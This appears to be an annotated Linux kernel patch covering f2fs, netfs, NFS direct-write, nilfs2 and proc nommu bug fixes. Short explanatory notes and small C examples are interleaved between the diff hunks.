+--- a/fs/f2fs/dir.c
++++ b/fs/f2fs/dir.c
+@@ -340,6 +340,7 @@ static struct f2fs_dir_entry *find_in_level(struct inode *dir,
+ 	unsigned int bidx, end_block;
+ 	struct page *dentry_page;
+ 	struct f2fs_dir_entry *de = NULL;
++	pgoff_t next_pgofs;
+ 	bool room = false;
+ 	int max_slots;
+ 
+@@ -350,12 +351,13 @@ static struct f2fs_dir_entry *find_in_level(struct inode *dir,
+ 			       le32_to_cpu(fname->hash) % nbucket);
+ 	end_block = bidx + nblock;
+ 
+-	for (; bidx < end_block; bidx++) {
++	while (bidx < end_block) {
+ 		/* no need to allocate new dentry pages to all the indices */
+-		dentry_page = f2fs_find_data_page(dir, bidx);
++		dentry_page = f2fs_find_data_page(dir, bidx, &next_pgofs);
+ 		if (IS_ERR(dentry_page)) {
+ 			if (PTR_ERR(dentry_page) == -ENOENT) {
+ 				room = true;
++				bidx = next_pgofs;
+ 				continue;
+ 			} else {
+ 				*res_page = dentry_page;
+@@ -376,6 +378,8 @@ static struct f2fs_dir_entry *find_in_level(struct inode *dir,
+ 		if (max_slots >= s)
+ 			room = true;
+ 		f2fs_put_page(dentry_page, 0);
++
++		bidx++;
+ 	}
+ 
+ 	if (!de && room && F2FS_I(dir)->chash != fname->hash) {
+@@ -963,7 +967,7 @@ void f2fs_delete_entry(struct f2fs_dir_entry *dentry, struct page *page,
+ 
+ bool f2fs_empty_dir(struct inode *dir)
+ {
+-	unsigned long bidx;
++	unsigned long bidx = 0;
+ 	struct page *dentry_page;
+ 	unsigned int bit_pos;
+ 	struct f2fs_dentry_block *dentry_blk;
+@@ -972,13 +976,17 @@ bool f2fs_empty_dir(struct inode *dir)
+ 	if (f2fs_has_inline_dentry(dir))
+ 		return f2fs_empty_inline_dir(dir);
+ 
+-	for (bidx = 0; bidx < nblock; bidx++) {
+-		dentry_page = f2fs_get_lock_data_page(dir, bidx, false);
++	while (bidx < nblock) {
++		pgoff_t next_pgofs;
++
++		dentry_page = f2fs_find_data_page(dir, bidx, &next_pgofs);
+ 		if (IS_ERR(dentry_page)) {
+-			if (PTR_ERR(dentry_page) == -ENOENT)
++			if (PTR_ERR(dentry_page) == -ENOENT) {
++				bidx = next_pgofs;
+ 				continue;
+-			else
++			} else {
+ 				return false;
++			}
+ 		}
+ 
+ 		dentry_blk = page_address(dentry_page);
+@@ -990,10 +998,12 @@ bool f2fs_empty_dir(struct inode *dir)
+ 						NR_DENTRY_IN_BLOCK,
+ 						bit_pos);
+ 
+-		f2fs_put_page(dentry_page, 1);
++		f2fs_put_page(dentry_page, 0);
+ 
+ 		if (bit_pos < NR_DENTRY_IN_BLOCK)
+ 			return false;
++
++		bidx++;
+ 	}
+ 	return true;
+ }
+@@ -1111,7 +1121,8 @@ static int f2fs_readdir(struct file *file, struct dir_context *ctx)
+ 		goto out_free;
+ 	}
+ 
+-	for (; n < npages; n++, ctx->pos = n * NR_DENTRY_IN_BLOCK) {
++	for (; n < npages; ctx->pos = n * NR_DENTRY_IN_BLOCK) {
++		pgoff_t next_pgofs;
+ 
+ 		/* allow readdir() to be interrupted */
+ 		if (fatal_signal_pending(current)) {
+@@ -1125,11 +1136,12 @@ static int f2fs_readdir(struct file *file, struct dir_context *ctx)
+ 			page_cache_sync_readahead(inode->i_mapping, ra, file, n,
+ 				min(npages - n, (pgoff_t)MAX_DIR_RA_PAGES));
+ 
+-		dentry_page = f2fs_find_data_page(inode, n);
++		dentry_page = f2fs_find_data_page(inode, n, &next_pgofs);
+ 		if (IS_ERR(dentry_page)) {
+ 			err = PTR_ERR(dentry_page);
+ 			if (err == -ENOENT) {
+ 				err = 0;
++				n = next_pgofs;
+ 				continue;
+ 			} else {
+ 				goto out_free;
+@@ -1148,6 +1160,8 @@ static int f2fs_readdir(struct file *file, struct dir_context *ctx)
+ 		}
+ 
+ 		f2fs_put_page(dentry_page, 0);
++
++		n++;
+ 	}
+ out_free:
+ 	fscrypt_fname_free_buffer(&fstr);
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index 37dca728ff967..f56abb39601ac 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -3784,8 +3784,9 @@ int f2fs_reserve_new_block(struct dnode_of_data *dn);
+ int f2fs_get_block(struct dnode_of_data *dn, pgoff_t index);
+ int f2fs_reserve_block(struct dnode_of_data *dn, pgoff_t index);
+ struct page *f2fs_get_read_data_page(struct inode *inode, pgoff_t index,
+-			blk_opf_t op_flags, bool for_write);
+-struct page *f2fs_find_data_page(struct inode *inode, pgoff_t index);
++			blk_opf_t op_flags, bool for_write, pgoff_t *next_pgofs);
++struct page *f2fs_find_data_page(struct inode *inode, pgoff_t index,
++							pgoff_t *next_pgofs);
+ struct page *f2fs_get_lock_data_page(struct inode *inode, pgoff_t index,
+ 			bool for_write);
+ struct page *f2fs_get_new_data_page(struct inode *inode,
+diff --git a/fs/f2fs/gc.c b/fs/f2fs/gc.c
+index aa4d513daa8f8..ec7212f7a9b73 100644
+--- a/fs/f2fs/gc.c
++++ b/fs/f2fs/gc.c
+@@ -1600,8 +1600,8 @@ next_step:
+ 				continue;
+ 			}
+ 
+-			data_page = f2fs_get_read_data_page(inode,
+-						start_bidx, REQ_RAHEAD, true);
++			data_page = f2fs_get_read_data_page(inode, start_bidx,
++							REQ_RAHEAD, true, NULL);
+ 			f2fs_up_write(&F2FS_I(inode)->i_gc_rwsem[WRITE]);
+ 			if (IS_ERR(data_page)) {
+ 				iput(inode);
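
The f2fs changes thread a next_pgofs out-parameter through the data-page lookups so directory walks can jump over holes: on -ENOENT the callee reports the next offset that might exist, and the caller resumes there instead of probing every missing index. The skip-ahead loop shape, over a made-up sparse index:

#include <stdio.h>

/* Sparse "directory": only a few block indices are populated. */
static const unsigned int populated[] = { 0, 1, 4096, 4097 };
#define NPOP (sizeof(populated) / sizeof(populated[0]))

/* Return 0 if @idx exists; otherwise -1 with *next set to the first
 * populated index after @idx (the role next_pgofs plays in f2fs). */
static int find_page(unsigned int idx, unsigned int *next)
{
	for (unsigned int i = 0; i < NPOP; i++) {
		if (populated[i] == idx)
			return 0;
		if (populated[i] > idx) {
			*next = populated[i];
			return -1;
		}
	}
	*next = ~0u;
	return -1;
}

int main(void)
{
	unsigned int idx = 0, probes = 0;

	while (idx != ~0u) {
		unsigned int next;

		probes++;
		if (find_page(idx, &next) == 0) {
			printf("visit block %u\n", idx);
			idx++;
		} else {
			idx = next;	/* hole: jump, don't increment */
		}
	}
	printf("probes: %u\n", probes);
	return 0;
}

Six probes cover the walk here; the old for-loops with a bare increment would have touched every index up to the last populated block.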
+diff --git a/fs/netfs/buffered_read.c b/fs/netfs/buffered_read.c
+index 7679a68e81930..caa0a053e8a9d 100644
+--- a/fs/netfs/buffered_read.c
++++ b/fs/netfs/buffered_read.c
+@@ -47,12 +47,14 @@ void netfs_rreq_unlock_folios(struct netfs_io_request *rreq)
+ 	xas_for_each(&xas, folio, last_page) {
+ 		loff_t pg_end;
+ 		bool pg_failed = false;
++		bool folio_started;
+ 
+ 		if (xas_retry(&xas, folio))
+ 			continue;
+ 
+ 		pg_end = folio_pos(folio) + folio_size(folio) - 1;
+ 
++		folio_started = false;
+ 		for (;;) {
+ 			loff_t sreq_end;
+ 
+@@ -60,8 +62,10 @@ void netfs_rreq_unlock_folios(struct netfs_io_request *rreq)
+ 				pg_failed = true;
+ 				break;
+ 			}
+-			if (test_bit(NETFS_SREQ_COPY_TO_CACHE, &subreq->flags))
++			if (!folio_started && test_bit(NETFS_SREQ_COPY_TO_CACHE, &subreq->flags)) {
+ 				folio_start_fscache(folio);
++				folio_started = true;
++			}
+ 			pg_failed |= subreq_failed;
+ 			sreq_end = subreq->start + subreq->len - 1;
+ 			if (pg_end < sreq_end)
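
The netfs fix adds a per-folio folio_started flag so folio_start_fscache() runs at most once per folio even when several subrequests overlap it; setting the fscache state on an already-marked folio is a bug. A once-only guard in a nested loop, reduced to its essentials:

#include <stdbool.h>
#include <stdio.h>

static int start_count;

static void start_fscache(void) { start_count++; }

int main(void)
{
	/* Three subrequests overlap the folio, all flagged copy-to-cache. */
	bool copy_to_cache[3] = { true, true, true };
	bool folio_started = false;

	for (int i = 0; i < 3; i++) {
		if (!folio_started && copy_to_cache[i]) {
			start_fscache();
			folio_started = true;	/* guard: fire once */
		}
	}
	printf("start_fscache calls: %d (was 3 before the fix)\n",
	       start_count);
	return 0;
}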
+diff --git a/fs/nfs/direct.c b/fs/nfs/direct.c
+index 3bb530d4bb5ce..5a976fa343df1 100644
+--- a/fs/nfs/direct.c
++++ b/fs/nfs/direct.c
+@@ -93,12 +93,10 @@ nfs_direct_handle_truncated(struct nfs_direct_req *dreq,
+ 		dreq->max_count = dreq_len;
+ 		if (dreq->count > dreq_len)
+ 			dreq->count = dreq_len;
+-
+-		if (test_bit(NFS_IOHDR_ERROR, &hdr->flags))
+-			dreq->error = hdr->error;
+-		else /* Clear outstanding error if this is EOF */
+-			dreq->error = 0;
+ 	}
++
++	if (test_bit(NFS_IOHDR_ERROR, &hdr->flags) && !dreq->error)
++		dreq->error = hdr->error;
+ }
+ 
+ static void
+@@ -120,6 +118,18 @@ nfs_direct_count_bytes(struct nfs_direct_req *dreq,
+ 		dreq->count = dreq_len;
+ }
+ 
++static void nfs_direct_truncate_request(struct nfs_direct_req *dreq,
++					struct nfs_page *req)
++{
++	loff_t offs = req_offset(req);
++	size_t req_start = (size_t)(offs - dreq->io_start);
++
++	if (req_start < dreq->max_count)
++		dreq->max_count = req_start;
++	if (req_start < dreq->count)
++		dreq->count = req_start;
++}
++
+ /**
+  * nfs_swap_rw - NFS address space operation for swap I/O
+  * @iocb: target I/O control block
+@@ -490,7 +500,9 @@ static void nfs_direct_add_page_head(struct list_head *list,
+ 	kref_get(&head->wb_kref);
+ }
+ 
+-static void nfs_direct_join_group(struct list_head *list, struct inode *inode)
++static void nfs_direct_join_group(struct list_head *list,
++				  struct nfs_commit_info *cinfo,
++				  struct inode *inode)
+ {
+ 	struct nfs_page *req, *subreq;
+ 
+@@ -512,7 +524,7 @@ static void nfs_direct_join_group(struct list_head *list, struct inode *inode)
+ 				nfs_release_request(subreq);
+ 			}
+ 		} while ((subreq = subreq->wb_this_page) != req);
+-		nfs_join_page_group(req, inode);
++		nfs_join_page_group(req, cinfo, inode);
+ 	}
+ }
+ 
+@@ -530,20 +542,15 @@ nfs_direct_write_scan_commit_list(struct inode *inode,
+ static void nfs_direct_write_reschedule(struct nfs_direct_req *dreq)
+ {
+ 	struct nfs_pageio_descriptor desc;
+-	struct nfs_page *req, *tmp;
++	struct nfs_page *req;
+ 	LIST_HEAD(reqs);
+ 	struct nfs_commit_info cinfo;
+-	LIST_HEAD(failed);
+ 
+ 	nfs_init_cinfo_from_dreq(&cinfo, dreq);
+ 	nfs_direct_write_scan_commit_list(dreq->inode, &reqs, &cinfo);
+ 
+-	nfs_direct_join_group(&reqs, dreq->inode);
++	nfs_direct_join_group(&reqs, &cinfo, dreq->inode);
+ 
+-	dreq->count = 0;
+-	dreq->max_count = 0;
+-	list_for_each_entry(req, &reqs, wb_list)
+-		dreq->max_count += req->wb_bytes;
+ 	nfs_clear_pnfs_ds_commit_verifiers(&dreq->ds_cinfo);
+ 	get_dreq(dreq);
+ 
+@@ -551,27 +558,40 @@ static void nfs_direct_write_reschedule(struct nfs_direct_req *dreq)
+ 			      &nfs_direct_write_completion_ops);
+ 	desc.pg_dreq = dreq;
+ 
+-	list_for_each_entry_safe(req, tmp, &reqs, wb_list) {
++	while (!list_empty(&reqs)) {
++		req = nfs_list_entry(reqs.next);
+ 		/* Bump the transmission count */
+ 		req->wb_nio++;
+ 		if (!nfs_pageio_add_request(&desc, req)) {
+-			nfs_list_move_request(req, &failed);
+-			spin_lock(&cinfo.inode->i_lock);
+-			dreq->flags = 0;
+-			if (desc.pg_error < 0)
++			spin_lock(&dreq->lock);
++			if (dreq->error < 0) {
++				desc.pg_error = dreq->error;
++			} else if (desc.pg_error != -EAGAIN) {
++				dreq->flags = 0;
++				if (!desc.pg_error)
++					desc.pg_error = -EIO;
+ 				dreq->error = desc.pg_error;
+-			else
+-				dreq->error = -EIO;
+-			spin_unlock(&cinfo.inode->i_lock);
++			} else
++				dreq->flags = NFS_ODIRECT_RESCHED_WRITES;
++			spin_unlock(&dreq->lock);
++			break;
+ 		}
+ 		nfs_release_request(req);
+ 	}
+ 	nfs_pageio_complete(&desc);
+ 
+-	while (!list_empty(&failed)) {
+-		req = nfs_list_entry(failed.next);
++	while (!list_empty(&reqs)) {
++		req = nfs_list_entry(reqs.next);
+ 		nfs_list_remove_request(req);
+ 		nfs_unlock_and_release_request(req);
++		if (desc.pg_error == -EAGAIN) {
++			nfs_mark_request_commit(req, NULL, &cinfo, 0);
++		} else {
++			spin_lock(&dreq->lock);
++			nfs_direct_truncate_request(dreq, req);
++			spin_unlock(&dreq->lock);
++			nfs_release_request(req);
++		}
+ 	}
+ 
+ 	if (put_dreq(dreq))
+@@ -591,8 +611,6 @@ static void nfs_direct_commit_complete(struct nfs_commit_data *data)
+ 	if (status < 0) {
+ 		/* Errors in commit are fatal */
+ 		dreq->error = status;
+-		dreq->max_count = 0;
+-		dreq->count = 0;
+ 		dreq->flags = NFS_ODIRECT_DONE;
+ 	} else {
+ 		status = dreq->error;
+@@ -603,7 +621,12 @@ static void nfs_direct_commit_complete(struct nfs_commit_data *data)
+ 	while (!list_empty(&data->pages)) {
+ 		req = nfs_list_entry(data->pages.next);
+ 		nfs_list_remove_request(req);
+-		if (status >= 0 && !nfs_write_match_verf(verf, req)) {
++		if (status < 0) {
++			spin_lock(&dreq->lock);
++			nfs_direct_truncate_request(dreq, req);
++			spin_unlock(&dreq->lock);
++			nfs_release_request(req);
++		} else if (!nfs_write_match_verf(verf, req)) {
+ 			dreq->flags = NFS_ODIRECT_RESCHED_WRITES;
+ 			/*
+ 			 * Despite the reboot, the write was successful,
+@@ -611,7 +634,7 @@ static void nfs_direct_commit_complete(struct nfs_commit_data *data)
+ 			 */
+ 			req->wb_nio = 0;
+ 			nfs_mark_request_commit(req, NULL, &cinfo, 0);
+-		} else /* Error or match */
++		} else
+ 			nfs_release_request(req);
+ 		nfs_unlock_and_release_request(req);
+ 	}
+@@ -664,6 +687,7 @@ static void nfs_direct_write_clear_reqs(struct nfs_direct_req *dreq)
+ 	while (!list_empty(&reqs)) {
+ 		req = nfs_list_entry(reqs.next);
+ 		nfs_list_remove_request(req);
++		nfs_direct_truncate_request(dreq, req);
+ 		nfs_release_request(req);
+ 		nfs_unlock_and_release_request(req);
+ 	}
+@@ -713,7 +737,8 @@ static void nfs_direct_write_completion(struct nfs_pgio_header *hdr)
+ 	}
+ 
+ 	nfs_direct_count_bytes(dreq, hdr);
+-	if (test_bit(NFS_IOHDR_UNSTABLE_WRITES, &hdr->flags)) {
++	if (test_bit(NFS_IOHDR_UNSTABLE_WRITES, &hdr->flags) &&
++	    !test_bit(NFS_IOHDR_ERROR, &hdr->flags)) {
+ 		if (!dreq->flags)
+ 			dreq->flags = NFS_ODIRECT_DO_COMMIT;
+ 		flags = dreq->flags;
+@@ -757,18 +782,23 @@ static void nfs_write_sync_pgio_error(struct list_head *head, int error)
+ static void nfs_direct_write_reschedule_io(struct nfs_pgio_header *hdr)
+ {
+ 	struct nfs_direct_req *dreq = hdr->dreq;
++	struct nfs_page *req;
++	struct nfs_commit_info cinfo;
+ 
+ 	trace_nfs_direct_write_reschedule_io(dreq);
+ 
++	nfs_init_cinfo_from_dreq(&cinfo, dreq);
+ 	spin_lock(&dreq->lock);
+-	if (dreq->error == 0) {
++	if (dreq->error == 0)
+ 		dreq->flags = NFS_ODIRECT_RESCHED_WRITES;
+-		/* fake unstable write to let common nfs resend pages */
+-		hdr->verf.committed = NFS_UNSTABLE;
+-		hdr->good_bytes = hdr->args.offset + hdr->args.count -
+-			hdr->io_start;
+-	}
++	set_bit(NFS_IOHDR_REDO, &hdr->flags);
+ 	spin_unlock(&dreq->lock);
++	while (!list_empty(&hdr->pages)) {
++		req = nfs_list_entry(hdr->pages.next);
++		nfs_list_remove_request(req);
++		nfs_unlock_request(req);
++		nfs_mark_request_commit(req, NULL, &cinfo, 0);
++	}
+ }
+ 
+ static const struct nfs_pgio_completion_ops nfs_direct_write_completion_ops = {
+@@ -796,9 +826,11 @@ static ssize_t nfs_direct_write_schedule_iovec(struct nfs_direct_req *dreq,
+ {
+ 	struct nfs_pageio_descriptor desc;
+ 	struct inode *inode = dreq->inode;
++	struct nfs_commit_info cinfo;
+ 	ssize_t result = 0;
+ 	size_t requested_bytes = 0;
+ 	size_t wsize = max_t(size_t, NFS_SERVER(inode)->wsize, PAGE_SIZE);
++	bool defer = false;
+ 
+ 	trace_nfs_direct_write_schedule_iovec(dreq);
+ 
+@@ -839,19 +871,39 @@ static ssize_t nfs_direct_write_schedule_iovec(struct nfs_direct_req *dreq,
+ 				break;
+ 			}
+ 
++			pgbase = 0;
++			bytes -= req_len;
++			requested_bytes += req_len;
++			pos += req_len;
++			dreq->bytes_left -= req_len;
++
++			if (defer) {
++				nfs_mark_request_commit(req, NULL, &cinfo, 0);
++				continue;
++			}
++
+ 			nfs_lock_request(req);
+ 			req->wb_index = pos >> PAGE_SHIFT;
+ 			req->wb_offset = pos & ~PAGE_MASK;
+-			if (!nfs_pageio_add_request(&desc, req)) {
++			if (nfs_pageio_add_request(&desc, req))
++				continue;
++
++			/* Exit on hard errors */
++			if (desc.pg_error < 0 && desc.pg_error != -EAGAIN) {
+ 				result = desc.pg_error;
+ 				nfs_unlock_and_release_request(req);
+ 				break;
+ 			}
+-			pgbase = 0;
+-			bytes -= req_len;
+-			requested_bytes += req_len;
+-			pos += req_len;
+-			dreq->bytes_left -= req_len;
++
++			/* If the error is soft, defer remaining requests */
++			nfs_init_cinfo_from_dreq(&cinfo, dreq);
++			spin_lock(&dreq->lock);
++			dreq->flags = NFS_ODIRECT_RESCHED_WRITES;
++			spin_unlock(&dreq->lock);
++			nfs_unlock_request(req);
++			nfs_mark_request_commit(req, NULL, &cinfo, 0);
++			desc.pg_error = 0;
++			defer = true;
+ 		}
+ 		nfs_direct_release_pages(pagevec, npages);
+ 		kvfree(pagevec);
+diff --git a/fs/nfs/flexfilelayout/flexfilelayout.c b/fs/nfs/flexfilelayout/flexfilelayout.c
+index 1ec79ccf89ad2..5c69a6e9ab3e1 100644
+--- a/fs/nfs/flexfilelayout/flexfilelayout.c
++++ b/fs/nfs/flexfilelayout/flexfilelayout.c
+@@ -1235,6 +1235,7 @@ static void ff_layout_io_track_ds_error(struct pnfs_layout_segment *lseg,
+ 		case -EPFNOSUPPORT:
+ 		case -EPROTONOSUPPORT:
+ 		case -EOPNOTSUPP:
++		case -EINVAL:
+ 		case -ECONNREFUSED:
+ 		case -ECONNRESET:
+ 		case -EHOSTDOWN:
+diff --git a/fs/nfs/nfs4client.c b/fs/nfs/nfs4client.c
+index d3051b051a564..84b345efcec00 100644
+--- a/fs/nfs/nfs4client.c
++++ b/fs/nfs/nfs4client.c
+@@ -231,6 +231,8 @@ struct nfs_client *nfs4_alloc_client(const struct nfs_client_initdata *cl_init)
+ 	__set_bit(NFS_CS_DISCRTRY, &clp->cl_flags);
+ 	__set_bit(NFS_CS_NO_RETRANS_TIMEOUT, &clp->cl_flags);
+ 
++	if (test_bit(NFS_CS_DS, &cl_init->init_flags))
++		__set_bit(NFS_CS_DS, &clp->cl_flags);
+ 	/*
+ 	 * Set up the connection to the server before we add it to the
+ 	 * global list.
+@@ -414,6 +416,8 @@ static void nfs4_add_trunk(struct nfs_client *clp, struct nfs_client *old)
+ 		.net = old->cl_net,
+ 		.servername = old->cl_hostname,
+ 	};
++	int max_connect = test_bit(NFS_CS_PNFS, &clp->cl_flags) ?
++		clp->cl_max_connect : old->cl_max_connect;
+ 
+ 	if (clp->cl_proto != old->cl_proto)
+ 		return;
+@@ -427,7 +431,7 @@ static void nfs4_add_trunk(struct nfs_client *clp, struct nfs_client *old)
+ 	xprt_args.addrlen = clp_salen;
+ 
+ 	rpc_clnt_add_xprt(old->cl_rpcclient, &xprt_args,
+-			  rpc_clnt_test_and_add_xprt, NULL);
++			  rpc_clnt_test_and_add_xprt, &max_connect);
+ }
+ 
+ /**
+@@ -993,6 +997,9 @@ struct nfs_client *nfs4_set_ds_client(struct nfs_server *mds_srv,
+ 	if (mds_srv->flags & NFS_MOUNT_NORESVPORT)
+ 		__set_bit(NFS_CS_NORESVPORT, &cl_init.init_flags);
+ 
++	__set_bit(NFS_CS_DS, &cl_init.init_flags);
++	__set_bit(NFS_CS_PNFS, &cl_init.init_flags);
++	cl_init.max_connect = NFS_MAX_TRANSPORTS;
+ 	/*
+ 	 * Set an authflavor equal to the MDS value. Use the MDS nfs_client
+ 	 * cl_ipaddr so as to use the same EXCHANGE_ID co_ownerid as the MDS
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index 2dec0fed1ba16..be570c65ae154 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -2708,8 +2708,12 @@ static int _nfs4_proc_open(struct nfs4_opendata *data,
+ 			return status;
+ 	}
+ 	if (!(o_res->f_attr->valid & NFS_ATTR_FATTR)) {
++		struct nfs_fh *fh = &o_res->fh;
++
+ 		nfs4_sequence_free_slot(&o_res->seq_res);
+-		nfs4_proc_getattr(server, &o_res->fh, o_res->f_attr, NULL);
++		if (o_arg->claim == NFS4_OPEN_CLAIM_FH)
++			fh = NFS_FH(d_inode(data->dentry));
++		nfs4_proc_getattr(server, fh, o_res->f_attr, NULL);
+ 	}
+ 	return 0;
+ }
+@@ -8794,6 +8798,8 @@ nfs4_run_exchange_id(struct nfs_client *clp, const struct cred *cred,
+ #ifdef CONFIG_NFS_V4_1_MIGRATION
+ 	calldata->args.flags |= EXCHGID4_FLAG_SUPP_MOVED_MIGR;
+ #endif
++	if (test_bit(NFS_CS_DS, &clp->cl_flags))
++		calldata->args.flags |= EXCHGID4_FLAG_USE_PNFS_DS;
+ 	msg.rpc_argp = &calldata->args;
+ 	msg.rpc_resp = &calldata->res;
+ 	task_setup_data.callback_data = calldata;
+@@ -8871,6 +8877,8 @@ static int _nfs4_proc_exchange_id(struct nfs_client *clp, const struct cred *cre
+ 	/* Save the EXCHANGE_ID verifier session trunk tests */
+ 	memcpy(clp->cl_confirm.data, argp->verifier.data,
+ 	       sizeof(clp->cl_confirm.data));
++	if (resp->flags & EXCHGID4_FLAG_USE_PNFS_DS)
++		set_bit(NFS_CS_DS, &clp->cl_flags);
+ out:
+ 	trace_nfs4_exchange_id(clp, status);
+ 	rpc_put_task(task);
+diff --git a/fs/nfs/write.c b/fs/nfs/write.c
+index f41d24b54fd1f..0a8aed0ac9945 100644
+--- a/fs/nfs/write.c
++++ b/fs/nfs/write.c
+@@ -58,7 +58,8 @@ static const struct nfs_pgio_completion_ops nfs_async_write_completion_ops;
+ static const struct nfs_commit_completion_ops nfs_commit_completion_ops;
+ static const struct nfs_rw_ops nfs_rw_write_ops;
+ static void nfs_inode_remove_request(struct nfs_page *req);
+-static void nfs_clear_request_commit(struct nfs_page *req);
++static void nfs_clear_request_commit(struct nfs_commit_info *cinfo,
++				     struct nfs_page *req);
+ static void nfs_init_cinfo_from_inode(struct nfs_commit_info *cinfo,
+ 				      struct inode *inode);
+ static struct nfs_page *
+@@ -502,8 +503,8 @@ nfs_destroy_unlinked_subrequests(struct nfs_page *destroy_list,
+  * the (former) group.  All subrequests are removed from any write or commit
+  * lists, unlinked from the group and destroyed.
+  */
+-void
+-nfs_join_page_group(struct nfs_page *head, struct inode *inode)
++void nfs_join_page_group(struct nfs_page *head, struct nfs_commit_info *cinfo,
++			 struct inode *inode)
+ {
+ 	struct nfs_page *subreq;
+ 	struct nfs_page *destroy_list = NULL;
+@@ -533,7 +534,7 @@ nfs_join_page_group(struct nfs_page *head, struct inode *inode)
+ 	 * Commit list removal accounting is done after locks are dropped */
+ 	subreq = head;
+ 	do {
+-		nfs_clear_request_commit(subreq);
++		nfs_clear_request_commit(cinfo, subreq);
+ 		subreq = subreq->wb_this_page;
+ 	} while (subreq != head);
+ 
+@@ -567,8 +568,10 @@ nfs_lock_and_join_requests(struct page *page)
+ {
+ 	struct inode *inode = page_file_mapping(page)->host;
+ 	struct nfs_page *head;
++	struct nfs_commit_info cinfo;
+ 	int ret;
+ 
++	nfs_init_cinfo_from_inode(&cinfo, inode);
+ 	/*
+ 	 * A reference is taken only on the head request which acts as a
+ 	 * reference to the whole page group - the group will not be destroyed
+@@ -585,7 +588,7 @@ nfs_lock_and_join_requests(struct page *page)
+ 		return ERR_PTR(ret);
+ 	}
+ 
+-	nfs_join_page_group(head, inode);
++	nfs_join_page_group(head, &cinfo, inode);
+ 
+ 	return head;
+ }
+@@ -956,18 +959,16 @@ nfs_clear_page_commit(struct page *page)
+ }
+ 
+ /* Called holding the request lock on @req */
+-static void
+-nfs_clear_request_commit(struct nfs_page *req)
++static void nfs_clear_request_commit(struct nfs_commit_info *cinfo,
++				     struct nfs_page *req)
+ {
+ 	if (test_bit(PG_CLEAN, &req->wb_flags)) {
+ 		struct nfs_open_context *ctx = nfs_req_openctx(req);
+ 		struct inode *inode = d_inode(ctx->dentry);
+-		struct nfs_commit_info cinfo;
+ 
+-		nfs_init_cinfo_from_inode(&cinfo, inode);
+ 		mutex_lock(&NFS_I(inode)->commit_mutex);
+-		if (!pnfs_clear_request_commit(req, &cinfo)) {
+-			nfs_request_remove_commit_list(req, &cinfo);
++		if (!pnfs_clear_request_commit(req, cinfo)) {
++			nfs_request_remove_commit_list(req, cinfo);
+ 		}
+ 		mutex_unlock(&NFS_I(inode)->commit_mutex);
+ 		nfs_clear_page_commit(req->wb_page);
+diff --git a/fs/nilfs2/gcinode.c b/fs/nilfs2/gcinode.c
+index b0d22ff24b674..fcd13da5d0125 100644
+--- a/fs/nilfs2/gcinode.c
++++ b/fs/nilfs2/gcinode.c
+@@ -73,10 +73,8 @@ int nilfs_gccache_submit_read_data(struct inode *inode, sector_t blkoff,
+ 		struct the_nilfs *nilfs = inode->i_sb->s_fs_info;
+ 
+ 		err = nilfs_dat_translate(nilfs->ns_dat, vbn, &pbn);
+-		if (unlikely(err)) { /* -EIO, -ENOMEM, -ENOENT */
+-			brelse(bh);
++		if (unlikely(err)) /* -EIO, -ENOMEM, -ENOENT */
+ 			goto failed;
+-		}
+ 	}
+ 
+ 	lock_buffer(bh);
+@@ -102,6 +100,8 @@ int nilfs_gccache_submit_read_data(struct inode *inode, sector_t blkoff,
+  failed:
+ 	unlock_page(bh->b_page);
+ 	put_page(bh->b_page);
++	if (unlikely(err))
++		brelse(bh);
+ 	return err;
+ }
+ 
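
The nilfs2 hunk is purely an ordering fix: the failed label dereferences bh->b_page, so dropping the buffer_head before jumping there risked touching a page the brelse() may already have released. The patched teardown order, annotated (a sketch of the resulting flow, not a verbatim copy):

failed:
	unlock_page(bh->b_page);	/* still needs bh to reach the page */
	put_page(bh->b_page);
	if (unlikely(err))
		brelse(bh);		/* only now drop the buffer_head ref */
	return err;

The general rule: release a resource last if any earlier cleanup step still dereferences it.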
+diff --git a/fs/proc/internal.h b/fs/proc/internal.h
+index b701d0207edf0..6b921826d85b6 100644
+--- a/fs/proc/internal.h
++++ b/fs/proc/internal.h
+@@ -289,9 +289,7 @@ struct proc_maps_private {
+ 	struct inode *inode;
+ 	struct task_struct *task;
+ 	struct mm_struct *mm;
+-#ifdef CONFIG_MMU
+ 	struct vma_iterator iter;
+-#endif
+ #ifdef CONFIG_NUMA
+ 	struct mempolicy *task_mempolicy;
+ #endif
+diff --git a/fs/proc/task_nommu.c b/fs/proc/task_nommu.c
+index 2fd06f52b6a44..dc05780f93e13 100644
+--- a/fs/proc/task_nommu.c
++++ b/fs/proc/task_nommu.c
+@@ -188,15 +188,28 @@ static int show_map(struct seq_file *m, void *_p)
+ 	return nommu_vma_show(m, _p);
+ }
+ 
+-static void *m_start(struct seq_file *m, loff_t *pos)
++static struct vm_area_struct *proc_get_vma(struct proc_maps_private *priv,
++						loff_t *ppos)
++{
++	struct vm_area_struct *vma = vma_next(&priv->iter);
++
++	if (vma) {
++		*ppos = vma->vm_start;
++	} else {
++		*ppos = -1UL;
++	}
++
++	return vma;
++}
++
++static void *m_start(struct seq_file *m, loff_t *ppos)
+ {
+ 	struct proc_maps_private *priv = m->private;
++	unsigned long last_addr = *ppos;
+ 	struct mm_struct *mm;
+-	struct vm_area_struct *vma;
+-	unsigned long addr = *pos;
+ 
+-	/* See m_next(). Zero at the start or after lseek. */
+-	if (addr == -1UL)
++	/* See proc_get_vma(). Zero at the start or after lseek. */
++	if (last_addr == -1UL)
+ 		return NULL;
+ 
+ 	/* pin the task and mm whilst we play with them */
+@@ -205,44 +218,41 @@ static void *m_start(struct seq_file *m, loff_t *pos)
+ 		return ERR_PTR(-ESRCH);
+ 
+ 	mm = priv->mm;
+-	if (!mm || !mmget_not_zero(mm))
++	if (!mm || !mmget_not_zero(mm)) {
++		put_task_struct(priv->task);
++		priv->task = NULL;
+ 		return NULL;
++	}
+ 
+ 	if (mmap_read_lock_killable(mm)) {
+ 		mmput(mm);
++		put_task_struct(priv->task);
++		priv->task = NULL;
+ 		return ERR_PTR(-EINTR);
+ 	}
+ 
+-	/* start the next element from addr */
+-	vma = find_vma(mm, addr);
+-	if (vma)
+-		return vma;
++	vma_iter_init(&priv->iter, mm, last_addr);
+ 
+-	mmap_read_unlock(mm);
+-	mmput(mm);
+-	return NULL;
++	return proc_get_vma(priv, ppos);
+ }
+ 
+-static void m_stop(struct seq_file *m, void *_vml)
++static void m_stop(struct seq_file *m, void *v)
+ {
